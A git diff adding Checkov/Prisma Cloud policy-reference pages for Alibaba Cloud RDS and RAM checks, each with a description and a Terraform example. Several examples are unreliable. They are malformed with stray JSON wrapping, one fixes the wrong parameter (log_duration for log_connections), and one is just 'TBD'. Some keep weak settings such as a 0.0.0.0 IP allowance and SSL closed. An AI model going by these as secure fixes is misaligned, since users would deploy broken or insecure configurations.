+[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 67278e79-50a7-43d0-96e9-2229fb1a72e4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py[CKV_ALI_35] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enabling the log_duration parameter in Alibaba Cloud RDS (Relational Database Service) instance can provide several benefits, including: + +* *Performance tuning:* The log_duration parameter can help you identify and analyze slow queries that may be impacting the performance of your RDS instance. +By measuring the duration of each query, you can identify which queries are taking the longest time to execute and optimize them to improve overall performance. + +* *Capacity planning:* The log_duration parameter can also help you with capacity planning by providing insights into the resource usage of your RDS instance. +By monitoring the duration of queries, you can identify which queries are consuming the most resources and plan accordingly for future growth and scaling. + + +//=== Fix - Buildtime diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc new file mode 100644 index 000000000..2934c754c --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-instance-is-set-to-perform-auto-upgrades-for-minor-versions.adoc @@ -0,0 +1,57 @@ +== Alibaba Cloud RDS instance is not set to perform auto upgrades for minor versions + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e44b0978-888c-4f5b-b1e8-15808b5a0e31 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py[CKV_ALI_30] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Auto upgrades for minor versions help ensure that your RDS instance is running the latest version, which can include security updates and patches. +By enabling auto upgrades, you can help protect your RDS instance and the data it contains from vulnerabilities and threats. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_db_instance" "pass" { + auto_upgrade_minor_version = "Auto" + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.s2.large" + instance_storage = "30" + instance_charge_type = "Postpaid" + instance_name = "myfirstdb" + vswitch_id = alicloud_vswitch.ditch.id + monitoring_period = "60" + ssl_action = "Close" +}", + +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc new file mode 100644 index 000000000..41a557dfd --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-cloud-rds-log-audit-is-enabled.adoc @@ -0,0 +1,152 @@ +== Alibaba Cloud RDS log audit is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 235041fc-facf-4048-97f6-df074bd99e22 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py[CKV_ALI_38] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +The Alibaba Cloud RDS log audit (log audit) helps to detect and prevent security breaches by monitoring database activity and logging all operations in order to detect anomalous configuration activity and trace back unapproved changes. Disabling the log audit feature can leave your database vulnerable to attacks and unauthorized access, increasing the risk of data breaches and other security incidents. To prevent this risk, enable the log audit. + +=== Fix - Buildtime + + +*Terraform* +Enable the Alibaba Cloud RDS log audit by adding the following code to your Terraform file during buildtime.' + + + +[source,go] +---- +{ + "resource "alicloud_log_audit" "pass" { + display_name = "tf-audit-test" + aliuid = "12345678" + variable_map = { + "actiontrail_enabled" = "true", + "actiontrail_ttl" = "180", + "actiontrail_ti_enabled" = "true", + "oss_access_enabled" = "true", + "oss_access_ttl" = "7", + "oss_sync_enabled" = "true", + "oss_sync_ttl" = "180", + "oss_access_ti_enabled" = "true", + "oss_metering_enabled" = "true", + "oss_metering_ttl" = "180", + "rds_enabled" = "true", + "rds_audit_collection_policy" = "", + "rds_ttl" = "180", + "rds_ti_enabled" = "true", + "rds_slow_enabled" = "true", + "rds_slow_collection_policy" = "", + "rds_slow_ttl" = "180", + "rds_perf_enabled" = "true", + "rds_perf_collection_policy" = "", + "rds_perf_ttl" = "180", + "vpc_flow_enabled" = "true", + "vpc_flow_ttl" = "7", + "vpc_flow_collection_policy" = "", + "vpc_sync_enabled" = "true", + "vpc_sync_ttl" = "180", + "polardb_enabled" = "true", + "polardb_audit_collection_policy" = "", + "polardb_ttl" = "180", + "polardb_ti_enabled" = "true", + "polardb_slow_enabled" = "true", + "polardb_slow_collection_policy" = "", + "polardb_slow_ttl" = "180", + "polardb_perf_enabled" = "true", + "polardb_perf_collection_policy" = "", + "polardb_perf_ttl" = "180", + "drds_audit_enabled" = "true", + "drds_audit_collection_policy" = "", + "drds_audit_ttl" = "7", + "drds_sync_enabled" = "true", + "drds_sync_ttl" = "180", + "drds_audit_ti_enabled" = "true", + "slb_access_enabled" = "true", + "slb_access_collection_policy" = "", + "slb_access_ttl" = "7", + "slb_sync_enabled" = "true", + "slb_sync_ttl" = "180", + "slb_access_ti_enabled" = "true", + "bastion_enabled" = "true", + "bastion_ttl" = "180", + "bastion_ti_enabled" = "true", + "waf_enabled" = "true", + "waf_ttl" = "180", + "waf_ti_enabled" = "true", + "cloudfirewall_enabled" = "true", + "cloudfirewall_ttl" = "180", + "cloudfirewall_ti_enabled" = "true", + "ddos_coo_access_enabled" = "true", + "ddos_coo_access_ttl" = "180", + "ddos_coo_access_ti_enabled" = "true", + "ddos_bgp_access_enabled" = "true", + "ddos_bgp_access_ttl" = "180", + "ddos_dip_access_enabled" = "true", + "ddos_dip_access_ttl" = "180", + "ddos_dip_access_ti_enabled" = "true", + "sas_crack_enabled" = "true", + "sas_dns_enabled" = "true", + "sas_http_enabled" = "true", + "sas_local_dns_enabled" = "true", + "sas_login_enabled" = "true", + "sas_network_enabled" = "true", + "sas_process_enabled" = "true", + "sas_security_alert_enabled" = "true", + "sas_security_hc_enabled" = "true", + "sas_security_vul_enabled" = "true", + "sas_session_enabled" = "true", + "sas_snapshot_account_enabled" = "true", + "sas_snapshot_port_enabled" = "true", + "sas_snapshot_process_enabled" = "true", + "sas_ttl" = "180", + "sas_ti_enabled" = "true", + "apigateway_enabled" = "true", + "apigateway_ttl" = "180", + "apigateway_ti_enabled" = "true", + "nas_enabled" = "true", + "nas_ttl" = "180", + "nas_ti_enabled" = "true", + "appconnect_enabled" = "true", + "appconnect_ttl" = "180", + "cps_enabled" = "true", + "cps_ttl" = "180", + "cps_ti_enabled" = "true", + "k8s_audit_enabled" = "true", + "k8s_audit_collection_policy" = "", + "k8s_audit_ttl" = "180", + "k8s_event_enabled" = "true", + "k8s_event_collection_policy" = "", + "k8s_event_ttl" = "180", + "k8s_ingress_enabled" = "true", + "k8s_ingress_collection_policy" = "", + "k8s_ingress_ttl" = "180" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-rds-instance-has-log-connections-enabled.adoc b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-rds-instance-has-log-connections-enabled.adoc new file mode 100644 index 000000000..fb0cc5de9 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-general-policies/ensure-alibaba-rds-instance-has-log-connections-enabled.adoc @@ -0,0 +1,64 @@ +== Alibaba RDS instance has log_connections disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5629f0fd-2e48-4fff-93e8-893c8b674613 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py[CKV_ALI_37] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +RDS does not log attempted connections by default. +Enabling the log_connections setting creates log entries for each attempted connection to the server, along with the successful completion of client authentication. +This information can be useful in troubleshooting issues and determining any unusual connection attempts to the server. +We recommend you set the log_connections database flag for Alibaba Cloud RDS instances to on. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + instance_type = "rds.mysql.t1.small" + instance_storage = "10" + tde_status = "Disabled" + auto_upgrade_minor_version = "Manual" + # ssl_action="Closed" + security_ips = [ + "0.0.0.0", + "10.23.12.24/24" + ] + parameters { + name = "log_duration" + value = "ON" + } + +}", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/alibaba-iam-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/alibaba-iam-policies.adoc new file mode 100644 index 000000000..d4bbf0ed8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/alibaba-iam-policies.adoc @@ -0,0 +1,54 @@ +== Alibaba IAM Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc[Alibaba Cloud RAM password policy maximal login attempts is more than 4] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py[CKV_ALI_23] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-enforces-mfa.adoc[Alibaba Cloud RAM does not enforce MFA] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py[CKV_ALI_24] +|LOW + + +|xref:ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc[Alibaba Cloud RAM password policy does not expire in 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py[CKV_ALI_16] +|LOW + + +|xref:ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc[Alibaba Cloud RAM password policy does not prevent password reuse] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py[CKV_ALI_18] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc[Alibaba Cloud RAM password policy does not have a lowercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py[CKV_ALI_17] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc[Alibaba Cloud RAM password policy does not have a number] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py[CKV_ALI_14] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc[Alibaba Cloud RAM password policy does not have a symbol] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py[CKV_ALI_15] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc[Alibaba Cloud RAM password policy does not have an uppercase character] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py[CKV_ALI_19] +|MEDIUM + + +|xref:ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc[Alibaba Cloud RAM password policy does not have a minimum of 14 characters] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py[CKV_ALI_13] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc new file mode 100644 index 000000000..95acdb969 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-account-maximal-login-attempts-is-less-than-5.adoc @@ -0,0 +1,58 @@ +== Alibaba Cloud RAM password policy maximal login attempts is more than 4 + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7a639003-05d4-42c7-8ee1-d8c885fce81b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py[CKV_ALI_23] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By default, the maximum login attempts for an Alibaba Cloud RAM account (account) is set to 5. After 5 failed login attempts, the account is locked. By lowering the number of allowed login attempts, the risk of unauthorized access to the account is decreased, as the chances of guessing the correct login credentials are reduced. This policy identifies accounts which have maximum login attempts set to 5 or more. + +=== Fix - Buildtime + + +*Terraform* + +To identify accounts which allow more that 5 login, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 9 + require_lowercase_characters = false + require_uppercase_characters = false + require_numbers = false + require_symbols = false + hard_expiry = true + max_password_age = 12 + password_reuse_prevention = 5 + max_login_attempts = 3 +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-enforces-mfa.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-enforces-mfa.adoc new file mode 100644 index 000000000..4a7db1af6 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-enforces-mfa.adoc @@ -0,0 +1,50 @@ +== Alibaba Cloud RAM does not enforce MFA + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 540437da-f551-4273-8cff-8a8377bcff8e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py[CKV_ALI_24] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Enforcing MFA helps protect your data from unauthorized access or tampering by requiring users to provide additional verification before accessing resources. +By enabling MFA, you can help ensure that only authorized users with the correct credentials can access your resources. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_ram_security_preference" "pass" { + enable_save_mfa_ticket = false + allow_user_to_change_password = true + enforce_mfa_for_login = true +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc new file mode 100644 index 000000000..0117c6199 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-expires-passwords-within-90-days-or-less.adoc @@ -0,0 +1,63 @@ +== Alibaba Cloud RAM password policy does not expire in 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 00a4e900-ca63-470f-9607-b7ad5cdd3ab3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py[CKV_ALI_16] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +As a best practice, it is important to change passwords after 90 days as a security measure to reduce the risk of unauthorized access to an account, as it reduces the window of opportunity for attackers to use stolen or compromised passwords. This policy identifies Alibaba Cloud RAM accounts (account)that do not have password expiration set to 90 days or more. + + +//// +=== Fix - Runtime +Alibaba Cloud Portal +. Log in to Alibaba Cloud Portal +. Go to Resource Access Management (RAM) service +. In the left-side navigation pane, click on 'Settings' +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' +. In the 'Password Validity Period' field, enter 90 or less based on your requirement. +. Click on 'OK' +. Click on 'Close' +//// + + + + +=== Fix - Buildtime + + +*Terraform* + +To identify accounts which have passwords that do not expire within 90 days, add the following code to your Terraform file during buildtime. + + +[source,go] +---- +{ + "TBD", +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc new file mode 100644 index 000000000..82fa2d904 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-prevents-password-reuse.adoc @@ -0,0 +1,58 @@ +== Alibaba Cloud RAM password policy does not prevent password reuse + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a7faf958-448d-4046-aa2e-8ce36ca3a538 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py[CKV_ALI_18] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +By default, the password policy for Alibaba Cloud RAM accounts (account) does not enforce restrictions on password reuse. If users reuse passwords, they become more vulnerable to password-related attacks, as it allows attackers to guess or recover an old password. To mitigate this risk and prevent unauthorized access to an account, enforce restrictions on password reuse to make it harder for attackers to guess or recover an old password. This policy identifies accounts that do not enforce restrictions on password reuse. + + +=== Fix - Buildtime + + +*Terraform* + +To identify accounts that do not enforce restrictions on password reuse, add the following code to your Terraform file during buildtime. + + +[source,go] +---- +{ + "resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = false + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 24 + max_login_attempts = 3 +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc new file mode 100644 index 000000000..b75c8f277 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-lowercase-letter.adoc @@ -0,0 +1,72 @@ +== Alibaba Cloud RAM password policy does not have a lowercase character + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a90974ff-16e0-4db9-be6e-73dc48eb5280 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py[CKV_ALI_17] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Including a lowercase character in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only uppercase or numeric characters in a password makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. By including lowercase characters, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a lowercase character for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include a lowercase character in their password policy. + +//// +=== Fix - Runtime +Alibaba Cloud Portal +. Log in to Alibaba Cloud Portal +. Go to Resource Access Management (RAM) service +. In the left-side navigation pane, click on 'Settings' +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' +. In the 'Required Elements in Password' field, select 'Lowercase Letters' +. Click on 'OK' +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* + +To identify accounts with passwords that do not include a lowercase character, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + " +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = true + require_uppercase_characters = false + require_numbers = false + require_symbols = false + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc new file mode 100644 index 000000000..90e1f8d1e --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-number.adoc @@ -0,0 +1,81 @@ +== Alibaba Cloud RAM password policy does not have a number + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| c4a553b0-c4ef-4bdb-85e0-a0ca4901d773 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py[CKV_ALI_14] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Including a number in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only uppercase or lowercase characters in a password makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. By including numbers, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a number for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include a number in their password policy. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Required Elements in Password' field, select 'Numbers' + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* +To identify accounts with passwords that do not include a number, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + " +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = true + require_numbers = true + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +}", + +} +---- diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc new file mode 100644 index 000000000..eaa38f45e --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-symbol.adoc @@ -0,0 +1,83 @@ +== Alibaba Cloud RAM password policy does not have a symbol + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e53d9690-7b9b-4934-b6e7-c30599f60792 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py[CKV_ALI_15] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + + +Including a symbol in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only uppercase or lowercase characters, or a number in a password, makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. By including symbols, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a symbol for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include a symbol in their password policy. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Required Elements in Password' field, select 'Symbols' + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* +To identify accounts with passwords that do not include a symbol, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = false + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc new file mode 100644 index 000000000..5f1544247 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-at-least-one-uppercase-letter.adoc @@ -0,0 +1,85 @@ +== Alibaba Cloud RAM password policy does not have an uppercase character + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a3e8df44-208d-4962-be8a-43ff7f8841e0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py[CKV_ALI_19] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + + + +Including a uppercase character in a password is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. Using only lowercase or numeric characters in a password makes it easier for attackers to perform a brute-force attack, where they try all possible combinations until they find the correct one. By including uppercase characters, the number of possible combinations increases, making it more challenging for attackers to guess or crack the password. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include an uppercase character for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include an uppercase character in their password policy. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Required Elements in Password' field, select 'Upper-Case Letter' + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* + +To identify accounts with passwords that do not include an uppercase character, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = true + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc new file mode 100644 index 000000000..02abe52b8 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-iam-policies/ensure-alibaba-cloud-ram-password-policy-requires-minimum-length-of-14-or-greater.adoc @@ -0,0 +1,88 @@ +== Alibaba Cloud RAM password policy does not have a minimum of 14 characters + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cf20eb0b-ce41-486f-a179-8d2a3cb0378d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py[CKV_ALI_13] + +|Severity +|MEDIUM + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Requiring passwords to include a minimum of 14 characters is important as it adds complexity and makes it harder for attackers to guess or crack the password using automated tools. To mitigate this risk and prevent unauthorized access to an account, enforce a policy requiring passwords to include a minimum of 14 characters for Alibaba Cloud RAM accounts (account). This policy identifies accounts that do not include a minimum of 14 characters in their password policy. + +This policy identifies Alibaba Cloud accounts that do not have a minimum of 14 characters in the password policy. +As a security best practice, configure a strong password policy for secure access to the Alibaba Cloud console. + +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Resource Access Management (RAM) service + +. In the left-side navigation pane, click on 'Settings' + +. In the 'Security Settings' tab, In the 'Password Strength Settings' Section, Click on 'Edit Password Rule' + +. In the 'Password Length' field, enter 14 as the minimum number of characters for password complexity. + +. Click on 'OK' + +. Click on 'Close' +//// + +=== Fix - Buildtime + + +*Terraform* + +To identify accounts with passwords that do not include a minimum of 14 characters, add the following code to your Terraform file during buildtime. + + + + +[source,go] +---- +{ + " +resource "alicloud_ram_account_password_policy" "pass" { + minimum_password_length = 14 + require_lowercase_characters = false + require_uppercase_characters = true + require_numbers = false + require_symbols = true + hard_expiry = true + max_password_age = 14 + password_reuse_prevention = 5 + max_login_attempts = 3 +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-kubernetes-policies/alibaba-kubernetes-policies.adoc 